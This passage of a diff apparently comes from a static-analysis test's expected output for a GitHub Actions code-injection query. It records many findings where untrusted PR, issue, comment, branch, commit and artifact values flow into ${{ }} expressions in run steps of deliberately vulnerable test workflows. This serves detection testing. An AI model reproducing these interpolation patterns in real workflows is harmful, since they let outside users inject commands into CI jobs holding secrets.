steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | 
@@ -697,170 +864,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test28.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
